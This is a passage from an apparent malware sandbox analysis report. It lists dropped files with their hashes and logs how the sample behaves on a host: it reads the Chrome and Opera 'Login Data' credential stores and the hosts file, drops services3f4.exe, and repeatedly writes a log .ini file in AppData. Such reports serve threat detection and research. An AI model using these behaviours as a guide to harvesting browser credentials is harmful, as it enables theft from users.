SHA1: 02992553de32e11a6e1416ab4ad1a08aebe896de SHA256: 5ecd13928dc594491192188fc6c6fee23dab29d418ccb5b1ea79bcbac9fd27ea SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXO:bd5y3hW995S1WhT2O |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logim.jpeg | 70.81 KB |
MD5:
23091e093682350693a09ed3e7261943
SHA1: cbef477ae47ef33f86f3e339f10e2250f34023b4 SHA256: 2586f83442ed6ff368cc2a301c565413da0d2737e6aa82787e1f1d26db044a02 SSDeep: 1536:baTsfUnjZr949iYVHFK3TMrj202GgUV7IYvkYqS1HA:OJjZr949zVHFrjR5gS7IYvkYqS2 |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.19 KB |
MD5:
7c6603f907d0e1a9071aa4e5b5a2f0c1
SHA1: 4bef59206d0a40451e9b532f53d04b06ca5416d0 SHA256: a75aa51baa25fe222e6dd10429bc56427fec4646768877bdc2fbb0ab6c4b5128 SSDeep: 3:MrKTleGQJhIQljlVgHlWvRS9lVfr8lilIXKlNlsTGkfovHiFqlEzSht/g7A:YKsGQPdEFWcHKzu8ykovjd |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.48 KB |
MD5:
e3c2cd4a74c2ffd0903e3d75f6629ce0
SHA1: a8f61a41801928553b3e1943f1980d1016a6ca78 SHA256: fcd6d105952cd96b6b7cd105a75e14f8c77a56a0472952fcf42b7ef968aeecda SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8aTy:bd5y3hW995S1WhT2GdA |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.70 KB |
MD5:
77dc8880c5d9b9ac9b370dcbee901b5f
SHA1: 9e8c2bfcd44c56597e1e8a49633f41203ce547a2 SHA256: 5695ffa0043d999d7d58767f77f4872a9c6f5699226cc47d59ebe2184207a5e2 SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaa9li2aLSRw5k02ln:YUd8acokH+gUca7b50WJ8akXZC5k04n |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.45 KB |
MD5:
7a2846b8217fde3b49ed4c8c83870d3c
SHA1: 241879087d0febc1ee45d3e6d45c300b218a38f5 SHA256: 86734736d24865f5db90a22286af38d8d87b27745eb7eb6313e6dcda891957c0 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8aTn:bd5y3hW995S1WhT2GdR |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.63 KB |
MD5:
8bf7b91c7738d990b962fafd0e1e9678
SHA1: 4fe6743b07323e2a25f78600f873f227fb87faaa SHA256: 65378c967d7a25ca43ec67ec9b37253f653bcb61913ffa8e3ad3ff20b1aaaf5b SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaa9li2aC:YUd8acokH+gUca7b50WJ8akXT |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.15 KB |
MD5:
da8fcfb0dfd9b91b1520a22798f6b905
SHA1: 0eee892dc78a72d47e7ef769abe9966eb229165e SHA256: c3740da4e1d9a6fade3d04cb0fa100e1ac94778a5d31929777a9b411d0317d17 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIn:bd5y3hW995S1WhT2I |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.66 KB |
MD5:
319f4425dd7c37cedc44f3f087d3c7ea
SHA1: 807ce732fe533fe8c7a8cfc7060747a1687c3592 SHA256: 535e35a2339815b8cc3e34990351d27b5d4efc5dc9b8a95a3222e480dca890f2 SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaa9li2aLSRw5kn:YUd8acokH+gUca7b50WJ8akXZC5kn |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrv.ini | 0.04 KB |
MD5:
ba3b6bc807d4f76794c4b81b09bb9ba5
SHA1: 24cb89501f0212ff3095ecc0aba97dd563718fb1 SHA256: 6eebf968962745b2e9de2ca969af7c424916d4e3fe3cc0bb9b3d414abfce9507 SSDeep: 3:AJlbeGQJhIl:tGQPY |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.51 KB |
MD5:
97bf533aa4441f79a7e3da57592a8d65
SHA1: f73d796ec249b3ad6632ee6c9ad066d355e6f781 SHA256: ee83bd3c6da050681bbab83da96830b2760a60b8ed567e7fc4d0749c4436bb6b SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGn:YUd8acokH+gUca7b50WJ8an |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.93 KB |
MD5:
6dce3344ad57a62cd8ec7c93a6743271
SHA1: ddbeb145b7ce8c75023e9930bc8fb77ece8b9773 SHA256: c0d2fb58b9bd30e9ed0a69802ed0fd38b2dcd1988a9e68689024d7ccca145bf6 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWS/:bd5y3hW995S1Ww |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.54 KB |
MD5:
66eaeb46ce185723c75eb0fad0655169
SHA1: 9e453e19785f7764351ceb56e5e9755744ce135d SHA256: f0c10fc5f095e9fd2191bc77bb0c43abaac08c3f600403cbdacedeee5620ee22 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8aTd7gU:bd5y3hW995S1WhT2GdQU |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.72 KB |
MD5:
204e1caa52bfe8e225f18f4b7cb2c301
SHA1: c250c16a51cfb7c6406428086cfd10f498c25b14 SHA256: 08c4ce677ac7e98143ef3ad6adcaf1d9923c2623c5c8ba78902770373b655129 SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaa9li2aLSRw5k02lWWZ:YUd8acokH+gUca7b50WJ8akXZC5k04RZ |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.50 KB |
MD5:
47b4ae20a4db67973df1a7e0435502d5
SHA1: 9cc57b41a161457c7b8a438ee60c81a82af0eae4 SHA256: 4ca63a9cb2e2dc4aea9e1c47de9d2f0c3a2da6607e43f592e3852199394d5bea SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8aTd7n:bd5y3hW995S1WhT2GdX |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.29 KB |
MD5:
a6d8b4b09830391a6b41afe870edcc63
SHA1: 0b9a94bebcaea7d58a708f18f1c9412ed6f9b4c3 SHA256: c28a72c1eb97bf8bb9161b19eb6b3beec96fd9007a52b9d23242531c060e04a0 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b5e:bd5y3hW995S1WhT2s |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.26 KB |
MD5:
cc79a99bd85167b3728b67d5974c7ac0
SHA1: f1fae1827384ebad9330c5c64c8ccac70162bbc9 SHA256: 9469ad3abc4997e7196f79d04155e180d2f6bcd2fc9e82403ccfcd6f5ad12d4f SSDeep: 3:MrKTleGQJhIQljlVgHlWvRS9lVfr8lilIXKlNlsTGkfovHiFqlEzSht/g7AWH/gD:YKsGQPdEFWcHKzu8ykovjtWCaYkHA9n |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.57 KB |
MD5:
677a3262f0fd5331646ac8ed78cee49e
SHA1: 8bfb56032a277b6733c2926d0e14bc31cc8df620 SHA256: 1d9aeadf89d9e4282de8fcabd484878de67195e899a337ae203ac55878911cb8 SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaaC:YUd8acokH+gUca7b50WJ8akq |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.29 KB |
MD5:
689359dd42340304335cd2a9a398a63a
SHA1: bb60048be8617b848429f7a096319147dc547d72 SHA256: 62f9c6efae6aedd5cb9e15de0e550a67793b6a7eab4a83eea395548adc4aed85 SSDeep: 6:YKsGQPdEFWcHKzu8ykovjtWCaYkHA9gNI0Azn:YMFDKzu8jGhWCaYkH+g60a |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.27 KB |
MD5:
6ae305f97c7b8b2060fb7cc57c0820d3
SHA1: 8b00fd514502231256dc41390d9f3046e818afd9 SHA256: 116e710ea95e7dea7b15417866c45e4dee539d23766b4cb12ae611a115da1a95 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b5n:bd5y3hW995S1WhT2Z |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.43 KB |
MD5:
93e3fdaed26be96a9fa5ec0e2a5cabf3
SHA1: 4c4909cdd2217a2ce5fd0f530a18130091c3dba4 SHA256: 3555855203aa0ac9aed38dc50e989d1945ff01df8782684c8f3ce7915421f257 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8aq:bd5y3hW995S1WhT2Gdc |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.31 KB |
MD5:
c2913f3350c38b727755c7ebfd540790
SHA1: d032e867b954c13e80f996d8e0f718dbed1f0acd SHA256: c07ebbca91e46acf2f6c698e0aec8cb8fd117b80955bd440b07971d17342057a SSDeep: 6:YKsGQPdEFWcHKzu8ykovjtWCaYkHA9gNI0AzcQgaSaC:YMFDKzu8jGhWCaYkH+g60QaaC |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.25 KB |
MD5:
4fb088cc18b8f9a7d4ed6b93d0d0fbee
SHA1: df634244a63551d993a1cfe832a606b33c1475ae SHA256: cb2f215bb30a34f645dbb860d22dc4a86937f632e18fb5a8418a8cd08ac9bc09 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7bk:bd5y3hW995S1WhT2E |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.64 KB |
MD5:
5ebd5e790a9386946d470ae84914c50e
SHA1: cb43a8c7899959f623c340304de2e69e1a0335bb SHA256: 03dd23340a73e5edaf3c63884242f8193b3271db5eb536dc0c48b6ea506ac328 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8aTd7gSX7l:bd5y3hW995S1WhT2GdQK |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 1.41 KB |
MD5:
5cfaebc60a6f117672b95cd94d55399b
SHA1: 90dab2e2184c170ff26f22c04087c63fdb9cdc48 SHA256: 918fae13feee59e1ac67eda919b389fe7302add0380807fa50e00db6d0c7f372 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8am:bd5y3hW995S1WhT2GdI |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logri.ini | 0.04 KB |
MD5:
d63a82e5d81e02e399090af26db0b9cb
SHA1: 91d0014c8f54743bba141fd60c9d963f869d76c9 SHA256: eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae SSDeep: 3:+slXllAGQJhIl:dlIGQPY |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.67 KB |
MD5:
8456e8cd47041d5317cf7ef3c90357a4
SHA1: d87ddcb9919972c00b000a11780ff14a684e419e SHA256: 0bce16afad3876ef4f4b411e9381831e8a527c4e00e49456982d06299d4d006f SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaa9li2aLSRw5k0J:YUd8acokH+gUca7b50WJ8akXZC5k0J |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.52 KB |
MD5:
266954cee4fef16e91d9de3ff3cf3828
SHA1: 6868d2a414d59aaf48900df34b7ccd588ce2dc2e SHA256: 4469d47394e52639494a0e22128a78b61dbd4fdaa7dd806564cda26c03344c7f SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGN:YUd8acokH+gUca7b50WJ8aN |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.80 KB |
MD5:
b54d5c23de68e39f5897ea44c1d934ee
SHA1: 9f86d34e4b8b72881cf815ad8ef3acb4b7a827cb SHA256: 61c9ba78ec47408de8914b51f6d115b4b19e789160ec1d6031d16ddf9aa91068 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBD:bd5y3hW995SD |
|
|
| c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | 0.76 KB |
MD5:
f1ffb9beb44c17659de136b6f0ffef5f
SHA1: e1e19c252eba8b97df80fb8ac4277cb002608b5b SHA256: 938744a7e86308aa443c3b6f7205b8c2dbbbfe2e3e813a510bbf55655ac9b4c4 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROx:bd5y3hW99N |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3C374A40-BAE4-11CF-BF7D-00AA006946EE | AFA0DC11-C313-11D0-831A-00C04FD5AE38 | cls_context = CLSCTX_INPROC_SERVER |
|
1 |
File (221)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \??\C:\Windows\SysWOW64\ntdll.dll | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\v4.0.30319\RegSvcs.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| Create | \??\C:\Windows\System32\drivers\etc\hosts | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| Create | \??\C:\Program Files (x86)\Lihhl\services3f4.exe | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Program Files (x86)\Lihhl\services3f4.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
8 | |
| Create | \??\C:\Program Files (x86)\Lihhl\services3f4.exe | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F | desired_access = FILE_READ_DATA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946log.ini | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
57 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logri.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logri.ini | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrv.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrv.ini | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| Get Info | \??\C:\Windows\SysWOW64\ntdll.dll | type = extended |
|
2 | |
| Get Info | \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | type = extended |
|
2 | |
| Get Info | \??\C:\Windows\System32\drivers\etc\hosts | type = extended |
|
2 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | type = extended |
|
57 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logri.ini | type = extended |
|
1 | |
| Get Info | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrv.ini | type = extended |
|
1 | |
| Get Info | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = extended |
|
2 | |
| Read | \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | offset = 0, size = 45216 |
|
1 | |
| Read | \??\C:\Windows\System32\drivers\etc\hosts | offset = 0, size = 824 |
|
1 | |
| Read | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | offset = 0, size = 275568 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 0, size = 40 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 40, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 52, size = 82 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 134, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 152, size = 22 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 174, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 198, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 218, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 244, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 262, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 290, size = 6 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 296, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 322, size = 46 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 368, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 400, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 420, size = 4 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 424, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 436, size = 82 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 518, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 536, size = 22 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 558, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 584, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 618, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 644, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 672, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 684, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 718, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 742, size = 16 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 758, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 782, size = 14 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 796, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 816, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 850, size = 46 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 896, size = 6 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 902, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 934, size = 16 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 950, size = 46 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 996, size = 180 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1176, size = 48 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1224, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1252, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1284, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1304, size = 4 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1308, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1320, size = 82 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1402, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1420, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1444, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1468, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1488, size = 26 |
|
1 | |
